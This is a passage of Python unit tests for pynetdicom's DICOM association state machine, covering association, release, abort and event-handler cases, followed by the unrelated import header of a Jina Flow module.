self.scp = scp = self.start_server(commands)
self.assoc.start()
for ii in range(len(commands)):
scp.step()
scp.shutdown()
assert self.fsm._changes[:14] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt14', 'AR-4'),
('Sta13', 'Evt17', 'AR-5'),
]
def test_acceptor(self):
"""Test hitting the acceptor with PDUs."""
# Also a regression test for #120
# C-ECHO-RQ
# 80 total length
echo_rq = (
b"\x04\x00\x00\x00\x00\x4a" # P-DATA-TF 74
b"\x00\x00\x00\x46\x01" # PDV Item 70
b"\x03" # PDV: 2 -> 69
b"\x00\x00\x00\x00\x04\x00\x00\x00\x42\x00\x00\x00" # 12 Command Group Length
b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38"
b"\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31\x00" # 26
b"\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00" # 10 Command Field
b"\x00\x00\x10\x01\x02\x00\x00\x00\x01\x00" # 10 Message ID
b"\x00\x00\x00\x08\x02\x00\x00\x00\x01\x01" # 10 Command Data Set Type
)
# Send associate request then c-echo requests then release request
commands = [
('send', a_associate_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
for ii in range(len(commands)):
scp.step()
scp.shutdown()
assert [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt14', 'AR-4'),
('Sta13', 'Evt17', 'AR-5'),
] == fsm._changes[:30]
class TestStateMachineFunctionalRequestor:
"""Functional tests for StateMachine as association requestor."""
def setup(self):
"""Run prior to each test"""
self.ae = None
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = 'localhost'
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
self.orig_ar2 = FINITE_STATE.ACTIONS['AR-2']
self.orig_ar4 = FINITE_STATE.ACTIONS['AR-4']
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
FINITE_STATE.ACTIONS['AR-4']= self.orig_ar4
FINITE_STATE.ACTIONS['AR-2']= self.orig_ar2
time.sleep(0.1)
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_monkey_patch(self):
"""Test monkey patching of StateMachine works as intended."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = self.monkey_patch(assoc.dul.state_machine)
assert fsm.current_state == 'Sta1'
fsm.current_state = 'Sta13'
fsm.do_action('Evt3')
assert fsm._changes == [('Sta13', 'Evt3', 'AA-6')]
assert fsm._transitions == ['Sta13']
def test_associate_accept_release(self):
"""Test normal association/release."""
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
if self.assoc.is_established:
self.assoc.release()
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
def test_associate_reject(self):
"""Test normal association rejection."""
self.ae = ae = AE()
ae.require_called_aet = True
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.assoc.is_rejected
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt4', 'AE-4'), # A-ASSOC-RJ PDU recv
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
def test_associate_accept_abort(self):
"""Test association acceptance then local abort."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
if self.assoc.is_established:
self.assoc.abort()
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta13', # Waiting for connection closed
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt15', 'AA-1'), # A-ABORT rq primitive
('Sta13', 'Evt17', 'AR-5'), # connection closed
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
def test_associate_accept_local_abort(self):
"""Test association acceptance then local abort if no cx."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.requestor.requested_contexts[0].abstract_syntax = '1.2.3'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta13', # Waiting for connection close
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt15', 'AA-1'), # A-ABORT rq primitive
('Sta13', 'Evt17', 'AR-5'), # Connection closed
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
def test_associate_accept_peer_abort(self):
"""Test association acceptance then peer abort."""
self.ae = ae = AE()
ae.network_timeout = 0.5
ae.acse_timeout = 5
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 1
):
time.sleep(0.05)
timeout += 0.05
timeout = 0
while not self.assoc.is_established and timeout < 1:
time.sleep(0.05)
timeout += 0.05
timeout = 0
while not self.assoc.is_aborted and timeout < 1:
time.sleep(0.05)
timeout += 0.05
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt16', 'AA-3'), # A-ABORT-RQ PDV recv
]
scp.shutdown()
def test_associate_send_data(self):
"""Test association acceptance then send DIMSE message."""
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
self.assoc.send_c_echo()
self.assoc.release()
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta6',
'Sta6',
'Sta7', # Waitinf for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt9', 'DT-1'), # P-DATA rq primitive
('Sta6', 'Evt10', 'DT-2'), # P-DATA-TF PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
def test_release_AR6(self):
"""Test receive P-DATA-TF while waiting for A-RELEASE-RP."""
# Requestor sends A-RELEASE-RQ, acceptor sends P-DATA-TF then
# A-RELEASE-RP
# Patch AR-4 to also send a P-DATA-TF
def AR_4(dul):
# Send C-ECHO-RQ
dul.socket.send(p_data_tf)
# Normal release response
dul.pdu = A_RELEASE_RP()
dul.pdu.from_primitive(dul.primitive)
# Callback
dul.socket.send(dul.pdu.encode())
dul.artim_timer.start()
return 'Sta13'
# In this case the association acceptor will hit AR_4
FINITE_STATE.ACTIONS['AR-4'] = ('Bluh', AR_4, 'Sta13')
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
self.assoc.release()
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt10', 'AR-6'), # P-DATA-TF PDU recv
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
def test_release_AR7(self):
"""Test receive P-DATA primitive after A-RELEASE-RQ PDU."""
def AR_2(dul):
"""AR-2 occurs when an A-RELEASE-RQ PDU is received."""
# Add P-DATA primitive request
primitive = C_ECHO()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = VerificationSOPClass
# Send C-ECHO request to the peer via DIMSE and wait for the response
dul.assoc.dimse.send_msg(primitive, 1)
# Normal AR2 response
dul.to_user_queue.put(dul.primitive)
return 'Sta8'
# In this case the association acceptor will hit AR_2
FINITE_STATE.ACTIONS['AR-2'] = ('Bluh', AR_2, 'Sta8')
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
self.assoc.release()
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt10', 'AR-6'), # P-DATA-TF PDU recv
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
class TestStateMachineFunctionalAcceptor:
"""Functional tests for StateMachine as association acceptor."""
def setup(self):
"""Run prior to each test"""
self.ae = None
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = 'localhost'
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
self.orig_entry = FINITE_STATE.ACTIONS['AE-2']
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
FINITE_STATE.ACTIONS['AE-2']= self.orig_entry
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_invalid_protocol_version(self):
"""Test receiving an A-ASSOC-RQ with invalid protocol version."""
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
def AE_2(dul):
dul.pdu = A_ASSOCIATE_RQ()
dul.pdu.from_primitive(dul.primitive)
dul.pdu.protocol_version = 0x0002
bytestream = dul.pdu.encode()
dul.socket.send(bytestream)
return 'Sta5'
FINITE_STATE.ACTIONS['AE-2'] = ('Bluh', AE_2, 'Sta5')
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
assert self.assoc.is_rejected
assert self.assoc.acceptor.primitive.result == 0x01
assert self.assoc.acceptor.primitive.result_source == 0x02
assert self.assoc.acceptor.primitive.diagnostic == 0x02
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
class TestEventHandling:
"""Test the FSM event handlers."""
def setup(self):
self.ae = None
def teardown(self):
if self.ae:
self.ae.shutdown()
def test_no_handlers(self):
"""Test with no handlers bound."""
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
scp.shutdown()
def test_transition_acceptor(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.release()
timeout = 0
while scp.active_associations and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
assert event.event.name == 'EVT_FSM_TRANSITION'
assert event.event.description == "State machine about to transition"
states = [ee.current_state for ee in triggered]
assert states[:6] == ['Sta1', 'Sta2', 'Sta3', 'Sta6', 'Sta8', 'Sta13']
scp.shutdown()
def test_transition_acceptor_bind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
time.sleep(0.5)
child = scp.active_associations[0]
assert child.dul.state_machine.current_state == 'Sta6'
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
scp.bind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.release()
timeout = 0
while scp.active_associations and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta6', 'Sta8', 'Sta13']
def test_transition_acceptor_unbind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
# Confirm that the handler is bound
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
time.sleep(0.5)
# Acceptor association
child = scp.active_associations[0]
# At this point we *must* have gone Sta1 -> Sta2 -> Sta3 -> Sta6
assert child.dul.state_machine.current_state == 'Sta6'
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
# Unbind the handler and confirm that its unbound
scp.unbind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
# Should go Sta6 -> Sta8 -> Sta13
assoc.release()
timeout = 0
while scp.active_associations and timeout < 10:
time.sleep(0.05)
timeout += 0.05
time.sleep(0.5)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
print(states)
assert states[:3] == ['Sta1', 'Sta2', 'Sta3']
scp.shutdown()
def test_transition_requestor(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112, evt_handlers=handlers)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assert assoc.is_established
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
timeout = 0
while not assoc.is_released and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:5] == ['Sta1', 'Sta4', 'Sta5', 'Sta6', 'Sta7']
scp.shutdown()
def test_transition_requestor_bind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.bind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
timeout = 0
while not assoc.is_released and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:2] == ['Sta6', 'Sta7']
scp.shutdown()
def test_transition_requestor_unbind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112, evt_handlers=handlers)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.unbind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
timeout = 0
while not assoc.is_released and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta1', 'Sta4', 'Sta5']
scp.shutdown()
def test_transition_raises(self, caplog):
"""Test the handler for EVT_FSM_TRANSITION raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
ae.add_requested_context(VerificationSOPClass)
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assoc.release()
timeout = 0
while scp.active_associations and timeout < 10:
time.sleep(0.05)
timeout += 0.05
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_FSM_TRANSITION' event "
"handler 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import multiprocessing
import os
import re
import sys
import threading
import time
import uuid
import warnings
from collections import OrderedDict
from contextlib import ExitStack
from typing import Optional, Union, Tuple, List, Set, Dict, overload, Type
from .builder import allowed_levels, _hanging_pods
from .. import __default_host__
from ..clients import Client
from ..clients.mixin import AsyncPostMixin, PostMixin
from ..enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
InfrastructureType,
PollingType,
)
from ..excepts import (
FlowTopologyError,
FlowMissingPodError,
RoutingTableCyclicError,
RuntimeFailToStart,
)
from ..helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from ..jaml import JAMLCompatible
from ..logging.logger import JinaLogger
from ..parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from ..parsers.flow import set_flow_parser
from ..peapods import CompoundPod, Pod
from ..peapods.pods.k8s import K8sPod
from ..peapods.pods.factory import PodFactory
from ..types.routing.table import RoutingTable
from ..peapods.networking import is_remote_local_connection
__all__ = ['Flow']
